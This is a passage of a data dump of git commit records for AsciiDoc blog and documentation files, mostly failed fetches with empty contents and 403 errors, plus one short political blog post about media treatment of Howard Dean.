2014-07-04-KISS.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2014-07-04-KISS.adoc","new_file":"_posts\/2014-07-04-KISS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6030a500e3669fefbcbd1b66047ecf6e588079a2","subject":"Update 2016-12-14-demo.adoc","message":"Update 2016-12-14-demo.adoc","repos":"moonPress\/press.io,moonPress\/press.io,moonPress\/press.io,moonPress\/press.io","old_file":"_posts\/2016-12-14-demo.adoc","new_file":"_posts\/2016-12-14-demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moonPress\/press.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3e700ac36020c0d29bbca1708b7ab76d2b535c5","subject":"Update 2018-02-23-test.adoc","message":"Update 2018-02-23-test.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-test.adoc","new_file":"_posts\/2018-02-23-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f29b4246cd13ea6be67a96df31bc42aed94362f1","subject":"Update 2018-03-10-Azure-10.adoc","message":"Update 2018-03-10-Azure-10.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-10-Azure-10.adoc","new_file":"_posts\/2018-03-10-Azure-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff40df65a71912effaa4ba33ba84a00e8396a5c1","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebaae7766ab5048c47e23bf754a022be82a6fda4","subject":"Add a coding style document","message":"Add a coding style document\n\nFixes #58\n","repos":"casimir\/kakoune,rstacruz\/kakoune,mawww\/kakoune,casimir\/kakoune,lenormf\/kakoune,jjthrash\/kakoune,flavius\/kakoune,zakgreant\/kakoune,Somasis\/kakoune,danr\/kakoune,elegios\/kakoune,jkonecny12\/kakoune,elegios\/kakoune,lenormf\/kakoune,danielma\/kakoune,alexherbo2\/kakoune,Somasis\/kakoune,ekie\/kakoune,ekie\/kakoune,xificurC\/kakoune,rstacruz\/kakoune,danr\/kakoune,mawww\/kakoune,flavius\/kakoune,zakgreant\/kakoune,jkonecny12\/kakoune,xificurC\/kakoune,occivink\/kakoune,alpha123\/kakoune,zakgreant\/kakoune,alexherbo2\/kakoune,casimir\/kakoune,elegios\/kakoune,ekie\/kakoune,Asenar\/kakoune,Asenar\/kakoune,rstacruz\/kakoune,alexherbo2\/kakoune,mawww\/kakoune,alpha123\/kakoune,xificurC\/kakoune,occivink\/kakoune,Asenar\/kakoune,ekie\/kakoune,danr\/kakoune,flavius\/kakoune,danr\/kakoune,xificurC\/kakoune,jkonecny12\/kakoune,danielma\/kakoune,casimir\/kakoune,Somasis\/kakoune,occivink\/kakoune,occivink\/kakoune,mawww\/kakoune,alexherbo2\/kakoune,zakgreant\/kakoune,Somasis\/kakoune,alpha123\/kakoune,jkonecny12\/kakoune,danielma\/kakoune,jjthrash\/kakoune,alpha123\/kakoune,jjthrash\/kakoune,jjthrash\/kakoune,danielma\/kakoune,Asenar\/kakoune,elegios\/kakoune,lenormf\/kakoune,flavius\/kakoune,lenormf\/kakoune,rstacruz\/kakoune","old_file":"doc\/coding-style.asciidoc","new_file":"doc\/coding-style.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ekie\/kakoune.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"26ea9fdd0a7e55db9980d761c4220612e10e5624","subject":"Update 2018-02-27-Migration-to-Lightning-Experience-A-Developers-Guide.adoc","message":"Update 2018-02-27-Migration-to-Lightning-Experience-A-Developers-Guide.adoc","repos":"arshakian\/arshakian.github.io,arshakian\/arshakian.github.io,arshakian\/arshakian.github.io","old_file":"_posts\/2018-02-27-Migration-to-Lightning-Experience-A-Developers-Guide.adoc","new_file":"_posts\/2018-02-27-Migration-to-Lightning-Experience-A-Developers-Guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arshakian\/arshakian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"92261bab604c85dfb4a073102a9b7cc4887bfeae","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/hello_world_again.adoc","new_file":"content\/writings\/hello_world_again.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"70fcb5ec7070d8cda1bffd9a79e7a2745195be6a","subject":"[docs] Add short troubleshooting note about nscd","message":"[docs] Add short troubleshooting note about nscd\n\nChange-Id: I9ace99c33d9161a0878c7c7570313ca5f895a7a9\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/10498\nReviewed-by: Andrew Wong <b68e4fdc6430321a6b47400732ff97d7ae91234e@cloudera.com>\nTested-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\n","repos":"helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu","old_file":"docs\/troubleshooting.adoc","new_file":"docs\/troubleshooting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7a403c528a92c18ae7576b949ff800fe1e86d638","subject":"Update 2015-07-11-Enthusiasm.adoc","message":"Update 2015-07-11-Enthusiasm.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2015-07-11-Enthusiasm.adoc","new_file":"_posts\/2015-07-11-Enthusiasm.adoc","new_contents":"= Enthusiasm.\n:hp-tags: politics\n\nimage::https:\/\/scontent-ams3-1.xx.fbcdn.net\/hphotos-xpf1\/v\/t1.0-9\/11014861_936544586383102_8303108115918938460_n.jpg?oh=773ce2a3dd72d234c67145fab380cd1e&oe=561AD611[]\n\nI honestly believe this is what happened to Howard Dean too. I was excited about Dean, he was the first candidate in my adult life who displayed anything like passion or enthusiasm or conviction.\n\nThe media drove him out of the race based entirely on footage of one enthusiastic shout.\n\nI wonder what the modern media would've made of Teddy Roosevelt.","old_contents":"","returncode":1,"stderr":"error: pathspec '_posts\/2015-07-11-Enthusiasm.adoc' did not match any file(s) known to git\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a127e91c296678ffc941323dfcc6576508300db","subject":"fixing link","message":"fixing link\n","repos":"brechin\/hypatia,brechin\/hypatia,hypatia-software-org\/hypatia-engine,lillian-lemmer\/hypatia,lillian-lemmer\/hypatia,Applemann\/hypatia,hypatia-software-org\/hypatia-engine,Applemann\/hypatia","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hypatia-software-org\/hypatia-engine.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f042cc140d29e1e28885ac7f20b669f90ed626cf","subject":"Update 2015-02-06-How-To-Convert-a-Jekyll-Markdown-Blog-to-HubPress.adoc","message":"Update 2015-02-06-How-To-Convert-a-Jekyll-Markdown-Blog-to-HubPress.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog","old_file":"_posts\/2015-02-06-How-To-Convert-a-Jekyll-Markdown-Blog-to-HubPress.adoc","new_file":"_posts\/2015-02-06-How-To-Convert-a-Jekyll-Markdown-Blog-to-HubPress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d450c629d889d6106cf9ab30051522f7ba7a41dc","subject":"Update 2017-11-20-A-Stupids-Guide-to-Learning-Concepts.adoc","message":"Update 2017-11-20-A-Stupids-Guide-to-Learning-Concepts.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-11-20-A-Stupids-Guide-to-Learning-Concepts.adoc","new_file":"_posts\/2017-11-20-A-Stupids-Guide-to-Learning-Concepts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"624e3f2fd59f8ebb63ee132bbcdd71885e4d8299","subject":"Update 2016-06-21-A-Fairy-Tale.adoc","message":"Update 2016-06-21-A-Fairy-Tale.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2016-06-21-A-Fairy-Tale.adoc","new_file":"_posts\/2016-06-21-A-Fairy-Tale.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31e4f453dcdcfa86a1d24e6ba31c4522380ecf45","subject":"Update 2016-11-04-About-The-Dullest-Saga.adoc","message":"Update 2016-11-04-About-The-Dullest-Saga.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-04-About-The-Dullest-Saga.adoc","new_file":"_posts\/2016-11-04-About-The-Dullest-Saga.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"027443878c1e982fabc14e96364023dcc848c3a5","subject":"Update 2016-05-27-My-First-Post-with-Hub-Press.adoc","message":"Update 2016-05-27-My-First-Post-with-Hub-Press.adoc","repos":"thezorgan\/thezorgan.github.io,thezorgan\/thezorgan.github.io,thezorgan\/thezorgan.github.io,thezorgan\/thezorgan.github.io","old_file":"_posts\/2016-05-27-My-First-Post-with-Hub-Press.adoc","new_file":"_posts\/2016-05-27-My-First-Post-with-Hub-Press.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thezorgan\/thezorgan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87342f69e67e97a02c6d682ab2ca8911927671ec","subject":"Update 2017-05-23-Running-Payara-in-Kubernetes.adoc","message":"Update 2017-05-23-Running-Payara-in-Kubernetes.adoc","repos":"pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io","old_file":"_posts\/2017-05-23-Running-Payara-in-Kubernetes.adoc","new_file":"_posts\/2017-05-23-Running-Payara-in-Kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pdudits\/pdudits.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d34e8e413157c72af284f2ffeb9243b06494f7a","subject":"Create README.adoc","message":"Create README.adoc","repos":"nmcl\/golang","old_file":"example\/src\/filedup\/README.adoc","new_file":"example\/src\/filedup\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmcl\/golang.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b8b1f76a11f8d4d256621f3dc57168f22cfa5664","subject":"Update 2015-08-03-Transition.adoc","message":"Update 2015-08-03-Transition.adoc","repos":"tedbergeron\/Transition,tedbergeron\/Transition,tedbergeron\/Transition","old_file":"_posts\/2015-08-03-Transition.adoc","new_file":"_posts\/2015-08-03-Transition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tedbergeron\/Transition.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a87374b13e5388231e64f7794806939c4f6ca34a","subject":"Update 2015-08-09-Hola-Mundo.adoc","message":"Update 2015-08-09-Hola-Mundo.adoc","repos":"Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,AlonsoCampos\/AlonsoCampos.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,AlonsoCampos\/AlonsoCampos.github.io,AlonsoCampos\/AlonsoCampos.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io","old_file":"_posts\/2015-08-09-Hola-Mundo.adoc","new_file":"_posts\/2015-08-09-Hola-Mundo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c6cc54d8c94bfc0c050e8d09e89a10fbe63f98d2","subject":"Update 2016-11-05-Dear-Diary.adoc","message":"Update 2016-11-05-Dear-Diary.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-Dear-Diary.adoc","new_file":"_posts\/2016-11-05-Dear-Diary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b32049bef205e713edc8a4bdda432f2dd70f224d","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63e976d0734039da6365fdc225f4bd29e860c867","subject":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","message":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02b99eef6f4c925ef51bc81232f4e45f052d3873","subject":"more minor tweaks to workshop abstracts","message":"more minor tweaks to workshop abstracts\n","repos":"couchbaselabs\/Workshop,couchbaselabs\/Workshop,couchbaselabs\/Workshop","old_file":"connect2016\/developer\/README.adoc","new_file":"connect2016\/developer\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/couchbaselabs\/Workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8f386598a2d1a0609488877c5183a533fe6b826f","subject":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","message":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"010affdd39e7efdbb7ea5ce75831564a583e9792","subject":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","message":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d4e150700624b80ebaea29e6f6fbd0081769aa9","subject":"Update 2017-07-26-Open-Pages-New-Workspace-Setup.adoc","message":"Update 2017-07-26-Open-Pages-New-Workspace-Setup.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-07-26-Open-Pages-New-Workspace-Setup.adoc","new_file":"_posts\/2017-07-26-Open-Pages-New-Workspace-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f331094f68cf2ce17abbebae153ce3ba926c14e","subject":"Update 2017-10-03-Authenticate-Woocommerce-Webhook-signature-in-Laravel-55.adoc","message":"Update 2017-10-03-Authenticate-Woocommerce-Webhook-signature-in-Laravel-55.adoc","repos":"neomobil\/neomobil.github.io,neomobil\/neomobil.github.io,neomobil\/neomobil.github.io,neomobil\/neomobil.github.io","old_file":"_posts\/2017-10-03-Authenticate-Woocommerce-Webhook-signature-in-Laravel-55.adoc","new_file":"_posts\/2017-10-03-Authenticate-Woocommerce-Webhook-signature-in-Laravel-55.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neomobil\/neomobil.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5be246b8ceb304300b2148c95b3a3db78dbc148f","subject":"Update 2015-05-08-Grails-Mapear-enum-para-um-campo-Integer-em-vez-de-String.adoc","message":"Update 2015-05-08-Grails-Mapear-enum-para-um-campo-Integer-em-vez-de-String.adoc","repos":"willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com","old_file":"_posts\/2015-05-08-Grails-Mapear-enum-para-um-campo-Integer-em-vez-de-String.adoc","new_file":"_posts\/2015-05-08-Grails-Mapear-enum-para-um-campo-Integer-em-vez-de-String.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willcrisis\/www.willcrisis.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1dfa471c60dea62ba23f84c93e05919ffafe4438","subject":"anotehr small update1","message":"anotehr small update1\n","repos":"dproc\/trex_odp_porting_integration,dimagol\/trex-core,wofanli\/trex-core,dimagol\/trex-core,dproc\/trex_odp_porting_integration,kisel\/trex-core,dimagol\/trex-core,dproc\/trex_odp_porting_integration,dproc\/trex_odp_porting_integration,dimagol\/trex-core,kisel\/trex-core,wofanli\/trex-core,wofanli\/trex-core,kisel\/trex-core,wofanli\/trex-core,kisel\/trex-core,kisel\/trex-core,wofanli\/trex-core,dimagol\/trex-core,kisel\/trex-core,wofanli\/trex-core,dproc\/trex_odp_porting_integration,dproc\/trex_odp_porting_integration,dimagol\/trex-core","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"162c0bbc75d67dda8557364c2cb70acb84bb2252","subject":"trying to get gif working","message":"trying to get gif working\n","repos":"brechin\/hypatia,hypatia-software-org\/hypatia-engine,lillian-lemmer\/hypatia,Applemann\/hypatia,brechin\/hypatia,Applemann\/hypatia,lillian-lemmer\/hypatia,hypatia-software-org\/hypatia-engine","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hypatia-software-org\/hypatia-engine.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"daa9d5b985f78d0fac7ecee0033c66994c76f8e3","subject":"Small edit","message":"Small edit\n","repos":"woorea\/vertx-web-site,vietj\/vertx,woorea\/vertx-web-site,cescoffier\/web-site,kevinbayes\/vertx-web-site,vietj\/vertx,michel-kraemer\/web-site,cescoffier\/web-site,karianna\/vertx-web-site,karianna\/vertx-web-site,michel-kraemer\/web-site,kevinbayes\/vertx-web-site,vert-x3\/vertx-web-site,karianna\/vertx-web-site,cescoffier\/web-site,cazacugmihai\/vertx-web-site,michel-kraemer\/web-site,vietj\/vertx,cazacugmihai\/vertx-web-site,vert-x3\/vertx-web-site,woorea\/vertx-web-site,kevinbayes\/vertx-web-site,cazacugmihai\/vertx-web-site,vert-x3\/vertx-web-site","old_file":"src\/main\/asciidoc\/manual.adoc","new_file":"src\/main\/asciidoc\/manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vert-x3\/vertx-web-site.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d3ae7fad96a1f955a0079ace8064a7240317ac94","subject":"update","message":"update\n","repos":"jarodsun\/note_everything","old_file":"notes.adoc","new_file":"notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarodsun\/note_everything.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"b84701f46eaa8d27ce248ccb519c582595dad8e9","subject":"y2b create post Top 20 Futuristic + Sports Cars! (Detroit Auto Show 2014)","message":"y2b create post Top 20 Futuristic + Sports Cars! (Detroit Auto Show 2014)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-01-27-Top-20-Futuristic--Sports-Cars-Detroit-Auto-Show-2014.adoc","new_file":"_posts\/2014-01-27-Top-20-Futuristic--Sports-Cars-Detroit-Auto-Show-2014.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2cfa2b90b2c0e32f047c6b092d76ea7777f283c5","subject":"Update 2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","message":"Update 2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_file":"_posts\/2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be4f1161b54b0cc8aac2e1e5b06d9fa6cce624b1","subject":"Publish 2016-6-29-PHP-CSV.adoc","message":"Publish 2016-6-29-PHP-CSV.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-29-PHP-CSV.adoc","new_file":"2016-6-29-PHP-CSV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4576f157db6f3b61d253dc9d35a34f01bc67ead3","subject":"Update 2016-07-29-kanban.adoc","message":"Update 2016-07-29-kanban.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-29-kanban.adoc","new_file":"_posts\/2016-07-29-kanban.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"732825b38e14e7e25e3ffedac5399855641390ce","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/json-schema-generator-maven-plugin,koh-osug\/json-schema-generator-maven-plugin","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/koh-osug\/json-schema-generator-maven-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fed4579a4002d588257707ebd520b88192376bbd","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00680ab1e659ee08ec825eaf95b4907ae86503a2","subject":"Added files via upload","message":"Added files via upload","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/MicroServiceCasualTalk.adoc","new_file":"_posts\/MicroServiceCasualTalk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 